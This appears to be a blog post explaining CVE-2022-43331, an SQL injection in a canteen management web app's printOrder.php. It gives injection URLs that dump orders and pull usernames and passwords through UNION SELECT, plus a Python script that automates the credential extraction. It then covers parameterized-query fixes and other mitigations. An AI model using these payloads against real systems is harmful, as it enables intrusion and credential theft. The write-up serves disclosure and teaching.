CVE-2022-43331 - Critical SQL Injection in Canteen Management System v1. Exploited via `id` Parameter

In late 2022, a serious SQL injection vulnerability was uncovered in Canteen Management System v1., which is a popular web-based application for managing canteen orders and inventory. Tracked as CVE-2022-43331, this issue permits attackers to inject malicious SQL via the id parameter on the /php_action/printOrder.php endpoint. This post breaks down how the vulnerability works, demonstrates an exploit, and gives practical advice for mitigation—using straightforward language for broad accessibility.

What is CVE-2022-43331?

CVE-2022-43331 is a security flaw in the Canteen Management System v1. where user-supplied data feeds unsanitized into SQL queries. Specifically, the id parameter on the printOrder.php page is not properly checked or sanitized. Malicious users can manipulate this to run their own SQL commands on the database.

References

- CVE Details - CVE-2022-43331
- Exploit Database ID 51011
- Original Disclosure

Where's the Problem?

The file /php_action/printOrder.php is meant to display printable order summaries based on the supplied order id (usually from a GET request). However, the code is naive and simply drops the id value straight into the SQL query, like so:

// php_action/printOrder.php (v1.)
$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE order_id = $id";
$result = mysqli_query($conn, $sql);

// ...process $result and output...

What's missing?

Input validation and sanitization are missing. There’s no check to see if id contains valid or safe input.

An attacker can alter the SQL query by supplying crafted input in the id parameter, like this

http://example.com/php_action/printOrder.php?id=1 OR 1=1

This changes the SQL statement to

SELECT * FROM orders WHERE order_id = 1 OR 1=1

The OR 1=1 always evaluates to true, so all orders are revealed instead of just one.

Suppose an attacker wants to pull user credentials. They could expand the injection

http://example.com/php_action/printOrder.php?id=1 UNION SELECT 1, username, password, 4 FROM users--

Now your SQL looks like

SELECT * FROM orders WHERE order_id = 1 
UNION 
SELECT 1, username, password, 4 FROM users--

If the columns match (or can be guessed), the response will include usernames and password hashes.

Exploit Demonstration

Here’s how a hacker might automate extracting sensitive data with Python and the popular requests library:

import requests

# Target URL
url = "http://example.com/php_action/printOrder.php";

# Malicious payload
payload = "1 UNION SELECT 1, username, password, 4 FROM users-- "

# Make request
params = {'id': payload}
response = requests.get(url, params=params)

# Show the response (would contain leaked user data)
print(response.text)

Replace http://example.com with the address of the vulnerable system.

The number one defense is using parameterized queries or prepared statements

// Secure version
$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE order_id = ?";
$stmt = $conn->prepare($sql);
$stmt->bind_param("i", $id); // "i" stands for integer
$stmt->execute();
$result = $stmt->get_result();

Make sure input is valid before using it

if (!is_numeric($_GET['id'])) {
    die("Invalid ID");
}

3. Least Privilege

Limit database user privileges so injected statements can't do maximum damage.

4. Keep Updated

Regularly check for updates to your CMS and apply security patches.

Conclusion

CVE-2022-43331 is a classic but dangerous SQL injection in Canteen Management System v1.. If you’re running this system, patch immediately and use secure coding practices moving forward. SQL injection is entirely preventable with modern coding approaches.

More Information

- OWASP SQL Injection Reference
- Reporting CVE-2022-43331 on NIST
- GitHub PoC

Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/01/2022 20:43:00 UTC